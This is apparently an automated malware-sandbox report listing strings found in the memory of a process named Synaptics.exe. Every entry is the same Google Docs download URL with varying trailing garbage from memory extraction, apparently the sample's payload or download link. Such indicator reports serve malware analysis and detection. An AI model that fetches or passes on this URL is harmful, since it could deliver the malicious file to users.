                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000006F52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2040812278.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2953691114.000000000089F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3012002014.000000000E4A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2959674730.00000000022A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                            Source: Synaptics.exe, 0000001D.00000002.3052445187.000000001D732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ&
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ0
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJd
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJw
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000006FA4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E64D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.00000000070B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKPP
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000006F52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2048249910.00000000054CD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2048249910.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3052445187.000000001D732000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.0000000007072000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3052445187.000000001D752000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004DB8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3057921806.000000001D895000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLE
                            Source: Synaptics.exe, 0000001D.00000002.2989870916.0000000007072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLName
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLi
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLm
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLt
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.000000000721B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.0000000007102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000006FA4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3012002014.000000000E4A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.00000000008DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNG_
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.00000000008DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNGk
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNO
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNe
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNo
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2051658236.0000000006F52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2953691114.0000000000918000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3055866183.000000001D7F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3015474774.000000000E5B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO=-
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000054CD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3052445187.000000001D752000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2953691114.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3055866183.000000001D7F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3008225961.000000000E30B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3057921806.000000001D895000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.0000000007192000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP/1.1
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPO
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPTZ
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPermi
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPn
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPr
                            Source: Synaptics.exe, 00000005.00000002.2039578728.0000000000719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP~3
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2051658236.0000000006F52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2048249910.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3052445187.000000001D732000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3012002014.000000000E4A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ=
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQi
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000006FA4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.0000000007192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3052445187.000000001D732000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3012002014.000000000E4A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadRZ
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.0000000000946000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadRu
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadRv
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.00000000070B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS:
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSan
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000054CD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2039578728.0000000000719000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3052445187.000000001D752000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3008225961.000000000E30B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3057921806.000000001D895000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT#P
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.0000000007192000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTOBWV
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTd
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadThe
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTo
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTt=##
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004D80000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.000000000721B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3015474774.000000000E5B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUH;
                            Source: Synaptics.exe, 0000001D.00000002.2989870916.0000000007072000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.00000000070B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUIE.x
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000006F52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2048249910.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.0000000007192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3006968919.000000000E2B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3012002014.000000000E4A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.000000000721B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.0000000007102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV_u
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVg
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000054CD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3055866183.000000001D7F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.00000000070B7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3015474774.000000000E5B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW&
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWSt
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWt
                            Source: Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3052445187.000000001D752000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3057921806.000000001D895000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3015474774.000000000E5B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXH
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXm
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXt
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000006F52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2048249910.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3012002014.000000000E4A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZi
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004DB8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.00000000070B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_#
                            Source: Synaptics.exe, 0000001D.00000002.3052445187.000000001D732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_&
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_P
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_w
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E64D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.0000000007192000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadaN01D5
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.0000000000946000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadad
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.0000000000946000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadadv
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadalifo
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadancisLe
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadany
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadat
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000006FA4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.0000000007192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3012002014.000000000E4A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbH
                            Source: Synaptics.exe, 0000001D.00000002.2989870916.0000000007072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb_
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbgl
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.0000000007192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.000000000721B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.00000000070B7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.0000000007102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
